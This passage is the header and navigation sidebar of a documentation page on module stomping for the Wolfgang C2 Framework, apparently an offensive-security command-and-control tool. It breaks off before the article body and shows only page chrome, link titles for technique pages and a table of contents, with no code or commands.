
<!DOCTYPE html>

<html class="no-js" lang="en">
<head>
<meta charset="utf-8"/>
<meta content="width=device-width,initial-scale=1" name="viewport"/>
<meta content="Comprehensive documentation for the Wolfgang C2 Framework" name="description"/>
<link href="../earlybird-apc/" rel="prev"/>
<link href="../reflective-loading/" rel="next"/>
<link href="../../../../tradecraft/injection/module-stomping/" hreflang="pt-BR" rel="alternate"/>
<link href="./" hreflang="en" rel="alternate"/>
<link href="../../../../assets/logo.svg" rel="icon"/>
<meta content="mkdocs-1.6.1, mkdocs-material-9.7.5" name="generator"/>
<title>Module Stomping - Wolfgang C2 Framework</title>
<link href="../../../../assets/stylesheets/main.484c7ddc.min.css" rel="stylesheet"/>
<link href="../../../../assets/stylesheets/palette.ab4e12ef.min.css" rel="stylesheet"/>
<link crossorigin="" href="https://fonts.gstatic.com" rel="preconnect"/>
<link href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&amp;display=fallback" rel="stylesheet"/>
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link href="../../../../assets/extra.css" rel="stylesheet"/>
<script>__md_scope=new URL("../../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
</head>
<body data-md-color-accent="purple" data-md-color-primary="deep-purple" data-md-color-scheme="slate" dir="ltr">
<input autocomplete="off" class="md-toggle" data-md-toggle="drawer" id="__drawer" type="checkbox"/>
<input autocomplete="off" class="md-toggle" data-md-toggle="search" id="__search" type="checkbox"/>
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a class="md-skip" href="#module-stomping">
          Skip to content
        </a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header" data-md-component="header">
<nav aria-label="Header" class="md-header__inner md-grid">
<a aria-label="Wolfgang C2 Framework" class="md-header__button md-logo" data-md-component="logo" href="../../../" title="Wolfgang C2 Framework">
<img alt="logo" src="../../../../assets/logo.svg"/>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"></path></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
            Wolfgang C2 Framework
          </span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
            
              Module Stomping
            
          </span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input aria-label="Switch to light mode" class="md-option" data-md-color-accent="purple" data-md-color-media="" data-md-color-primary="deep-purple" data-md-color-scheme="slate" id="__palette_0" name="__palette" type="radio"/>
<label class="md-header__button md-icon" for="__palette_1" hidden="" title="Switch to light mode">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"></path></svg>
</label>
<input aria-label="Switch to dark mode" class="md-option" data-md-color-accent="purple" data-md-color-media="" data-md-color-primary="deep-purple" data-md-color-scheme="default" id="__palette_1" name="__palette" type="radio"/>
<label class="md-header__button md-icon" for="__palette_0" hidden="" title="Switch to dark mode">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"></path></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<div class="md-header__option">
<div class="md-select">
<button aria-label="Select language" class="md-header__button md-icon">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="m12.87 15.07-2.54-2.51.03-.03A17.5 17.5 0 0 0 14.07 6H17V4h-7V2H8v2H1v2h11.17C11.5 7.92 10.44 9.75 9 11.35 8.07 10.32 7.3 9.19 6.69 8h-2c.73 1.63 1.73 3.17 2.98 4.56l-5.09 5.02L4 19l5-5 3.11 3.11zM18.5 10h-2L12 22h2l1.12-3h4.75L21 22h2zm-2.62 7 1.62-4.33L19.12 17z"></path></svg>
</button>
<div class="md-select__inner">
<ul class="md-select__list">
<li class="md-select__item">
<a class="md-select__link" href="../../../../tradecraft/injection/module-stomping/" hreflang="pt-BR">
              Português
            </a>
</li>
<li class="md-select__item">
<a class="md-select__link" href="./" hreflang="en">
              English
            </a>
</li>
</ul>
</div>
</div>
</div>
<label class="md-header__button md-icon" for="__search">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"></path></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input aria-label="Search" autocapitalize="off" autocomplete="off" autocorrect="off" class="md-search__input" data-md-component="search-query" name="query" placeholder="Search" required="" spellcheck="false" type="text"/>
<label class="md-search__icon md-icon" for="__search">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"></path></svg>
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"></path></svg>
</label>
<nav aria-label="Search" class="md-search__options">
<button aria-label="Clear" class="md-search__icon md-icon" tabindex="-1" title="Clear" type="reset">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix="" tabindex="0">
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
            Initializing search
          </div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<nav aria-label="Tabs" class="md-tabs" data-md-component="tabs">
<div class="md-grid">
<ul class="md-tabs__list">
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../">
        
  
  
    
  
  Home

      </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../getting-started/">
          
  
  
    
  
  Getting Started

        </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../operator-guide/">
          
  
  
    
  
  Operator Guide

        </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../architecture/">
          
  
  
    
  
  Architecture

        </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../developer-guide/">
          
  
  
    
  
  Developer Guide

        </a>
</li>
<li class="md-tabs__item md-tabs__item--active">
<a class="md-tabs__link" href="../../">
          
  
  
    
  
  Tradecraft

        </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../modules/">
          
  
  
    
  
  Module Catalog

        </a>
</li>
<li class="md-tabs__item">
<a class="md-tabs__link" href="../../../api/">
          
  
  
    
  
  API Reference

        </a>
</li>
</ul>
</div>
</nav>
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation">
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav aria-label="Navigation" class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a aria-label="Wolfgang C2 Framework" class="md-nav__button md-logo" data-md-component="logo" href="../../../" title="Wolfgang C2 Framework">
<img alt="logo" src="../../../../assets/logo.svg"/>
</a>
    Wolfgang C2 Framework
  </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../">
<span class="md-ellipsis">
    
  
    Home
  

    
  </span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_2" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../getting-started/">
<span class="md-ellipsis">
    
  
    Getting Started
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_2_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_2">
<span class="md-nav__icon md-icon"></span>
            
  
    Getting Started
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../getting-started/quickstart/">
<span class="md-ellipsis">
    
  
    Quickstart
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../getting-started/first-implant/">
<span class="md-ellipsis">
    
  
    First Implant
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../getting-started/first-operation/">
<span class="md-ellipsis">
    
  
    First Operation
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../getting-started/next-steps/">
<span class="md-ellipsis">
    
  
    Next Steps
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_3" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../operator-guide/">
<span class="md-ellipsis">
    
  
    Operator Guide
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_3_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
            
  
    Operator Guide
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/server-setup/">
<span class="md-ellipsis">
    
  
    Server Setup
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/listeners/">
<span class="md-ellipsis">
    
  
    Listeners
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/implant-generation/">
<span class="md-ellipsis">
    
  
    Implant Generation
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/cli-reference/">
<span class="md-ellipsis">
    
  
    CLI Reference
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/agent-management/">
<span class="md-ellipsis">
    
  
    Agent Management
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/task-system/">
<span class="md-ellipsis">
    
  
    Task System
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/modules/">
<span class="md-ellipsis">
    
  
    Modules
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/exfiltration/">
<span class="md-ellipsis">
    
  
    Exfiltration
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/redirectors/">
<span class="md-ellipsis">
    
  
    Redirectors
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../operator-guide/plugins/">
<span class="md-ellipsis">
    
  
    Plugins
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_4" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../architecture/">
<span class="md-ellipsis">
    
  
    Architecture
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_4_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
            
  
    Architecture
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/overview/">
<span class="md-ellipsis">
    
  
    Overview
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/protocol/">
<span class="md-ellipsis">
    
  
    Protocol
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/crypto/">
<span class="md-ellipsis">
    
  
    Cryptography
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/transport/">
<span class="md-ellipsis">
    
  
    Transport
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/modules/">
<span class="md-ellipsis">
    
  
    Modules
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/storage/">
<span class="md-ellipsis">
    
  
    Storage
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/auth/">
<span class="md-ellipsis">
    
  
    Authentication
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/plugins/">
<span class="md-ellipsis">
    
  
    Plugins
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../architecture/implant-internals/">
<span class="md-ellipsis">
    
  
    Implant Internals
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_5" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../developer-guide/">
<span class="md-ellipsis">
    
  
    Developer Guide
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_5_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
            
  
    Developer Guide
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/project-structure/">
<span class="md-ellipsis">
    
  
    Project Structure
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/adding-modules/">
<span class="md-ellipsis">
    
  
    Adding Modules
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/adding-transports/">
<span class="md-ellipsis">
    
  
    Adding Transports
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/plugin-sdk/">
<span class="md-ellipsis">
    
  
    Plugin SDK
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/testing/">
<span class="md-ellipsis">
    
  
    Testing
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../developer-guide/build-system/">
<span class="md-ellipsis">
    
  
    Build System
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
<input checked="" class="md-nav__toggle md-toggle" id="__nav_6" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../">
<span class="md-ellipsis">
    
  
    Tradecraft
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="true" aria-labelledby="__nav_6_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
            
  
    Tradecraft
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item md-nav__item--section md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_6_2" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../evasion/">
<span class="md-ellipsis">
    
  
    Evasion
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6_2" id="__nav_6_2_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_6_2_label" class="md-nav" data-md-level="2">
<label class="md-nav__title" for="__nav_6_2">
<span class="md-nav__icon md-icon"></span>
            
  
    Evasion
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/amsi-bypass/">
<span class="md-ellipsis">
    
  
    AMSI Bypass
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/etw-bypass/">
<span class="md-ellipsis">
    
  
    ETW Bypass
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/sandbox-detection/">
<span class="md-ellipsis">
    
  
    Sandbox Detection
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/sleep-obfuscation/">
<span class="md-ellipsis">
    
  
    Sleep Obfuscation
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/direct-syscalls/">
<span class="md-ellipsis">
    
  
    Direct Syscalls
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/memory-encryption/">
<span class="md-ellipsis">
    
  
    Memory Encryption
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../evasion/hwbp-bypass/">
<span class="md-ellipsis">
    
  
    HWBP Bypass
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
<input checked="" class="md-nav__toggle md-toggle" id="__nav_6_3" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../">
<span class="md-ellipsis">
    
  
    Injection
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6_3" id="__nav_6_3_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="true" aria-labelledby="__nav_6_3_label" class="md-nav" data-md-level="2">
<label class="md-nav__title" for="__nav_6_3">
<span class="md-nav__icon md-icon"></span>
            
  
    Injection
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../process-hollowing/">
<span class="md-ellipsis">
    
  
    Process Hollowing
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../earlybird-apc/">
<span class="md-ellipsis">
    
  
    EarlyBird APC
  

    
  </span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" id="__toc" type="checkbox"/>
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
    
  
    Module Stomping
  

    
  </span>
<span class="md-nav__icon md-icon"></span>
</label>
<a class="md-nav__link md-nav__link--active" href="./">
<span class="md-ellipsis">
    
  
    Module Stomping
  

    
  </span>
</a>
<nav aria-label="Table of contents" class="md-nav md-nav--secondary">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="#o-que-e">
<span class="md-ellipsis">
      
        O que é
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#por-que-funciona">
<span class="md-ellipsis">
      
        Por que funciona
      
    </span>
</a>
<nav aria-label="Por que funciona" class="md-nav">
<ul class="md-nav__list">
<li class="md-nav__item">
<a class="md-nav__link" href="#memory-backed-vs-unbacked">
<span class="md-ellipsis">
      
        Memory-Backed vs Unbacked
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#selecao-da-dll-alvo">
<span class="md-ellipsis">
      
        Seleção da DLL alvo
      
    </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#implementacao-no-wolfgang">
<span class="md-ellipsis">
      
        Implementação no Wolfgang
      
    </span>
</a>
<nav aria-label="Implementação no Wolfgang" class="md-nav">
<ul class="md-nav__list">
<li class="md-nav__item">
<a class="md-nav__link" href="#interface-do-modulo">
<span class="md-ellipsis">
      
        Interface do módulo
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#carregamento-e-parse-da-dll">
<span class="md-ellipsis">
      
        Carregamento e parse da DLL
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#stomping-e-execucao">
<span class="md-ellipsis">
      
        Stomping e execução
      
    </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#fluxo-de-execucao">
<span class="md-ellipsis">
      
        Fluxo de Execução
      
    </span>
</a>
<nav aria-label="Fluxo de Execução" class="md-nav">
<ul class="md-nav__list">
<li class="md-nav__item">
<a class="md-nav__link" href="#visao-do-edr">
<span class="md-ellipsis">
      
        Visão do EDR
      
    </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#deteccao">
<span class="md-ellipsis">
      
        Detecção
      
    </span>
</a>
<nav aria-label="Detecção" class="md-nav">
<ul class="md-nav__list">
<li class="md-nav__item">
<a class="md-nav__link" href="#deteccao-por-integrity-check">
<span class="md-ellipsis">
      
        Detecção por integrity check
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#contramedidas">
<span class="md-ellipsis">
      
        Contramedidas
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#vantagens-sobre-outras-tecnicas">
<span class="md-ellipsis">
      
        Vantagens sobre outras técnicas
      
    </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#mitre-attck">
<span class="md-ellipsis">
      
        MITRE ATT&amp;CK
      
    </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="#veja-tambem">
<span class="md-ellipsis">
      
        Veja também
      
    </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../reflective-loading/">
<span class="md-ellipsis">
    
  
    Reflective Loading
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--section md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_6_4" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../credential-access/">
<span class="md-ellipsis">
    
  
    Credential Access
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6_4" id="__nav_6_4_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_6_4_label" class="md-nav" data-md-level="2">
<label class="md-nav__title" for="__nav_6_4">
<span class="md-nav__icon md-icon"></span>
            
  
    Credential Access
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../credential-access/lsass-dumping/">
<span class="md-ellipsis">
    
  
    LSASS Dumping
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../credential-access/registry-hives/">
<span class="md-ellipsis">
    
  
    Registry Hives
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../credential-access/kerberoasting/">
<span class="md-ellipsis">
    
  
    Kerberoasting
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../credential-access/vault-extraction/">
<span class="md-ellipsis">
    
  
    Vault Extraction
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--section md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_6_5" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../persistence/">
<span class="md-ellipsis">
    
  
    Persistence
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6_5" id="__nav_6_5_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_6_5_label" class="md-nav" data-md-level="2">
<label class="md-nav__title" for="__nav_6_5">
<span class="md-nav__icon md-icon"></span>
            
  
    Persistence
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../persistence/windows-registry/">
<span class="md-ellipsis">
    
  
    Windows Registry
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../persistence/scheduled-tasks/">
<span class="md-ellipsis">
    
  
    Scheduled Tasks
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../persistence/linux-cron/">
<span class="md-ellipsis">
    
  
    Linux Cron
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../persistence/macos-launchd/">
<span class="md-ellipsis">
    
  
    macOS Launchd
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--section md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_6_6" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../lateral-movement/">
<span class="md-ellipsis">
    
  
    Lateral Movement
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_6_6" id="__nav_6_6_label" tabindex="">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_6_6_label" class="md-nav" data-md-level="2">
<label class="md-nav__title" for="__nav_6_6">
<span class="md-nav__icon md-icon"></span>
            
  
    Lateral Movement
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../lateral-movement/port-forwarding/">
<span class="md-ellipsis">
    
  
    Port Forwarding
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../lateral-movement/socks-proxy/">
<span class="md-ellipsis">
    
  
    SOCKS Proxy
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../lateral-movement/pivot-chains/">
<span class="md-ellipsis">
    
  
    Pivot Chains
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../lateral-movement/remote-execution/">
<span class="md-ellipsis">
    
  
    Remote Execution
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_7" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../modules/">
<span class="md-ellipsis">
    
  
    Module Catalog
  

    
  </span>
</a>
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-nav__icon md-icon"></span>
</label>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_7_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
            
  
    Module Catalog
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/shell/">
<span class="md-ellipsis">
    
  
    Shell
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/fileops/">
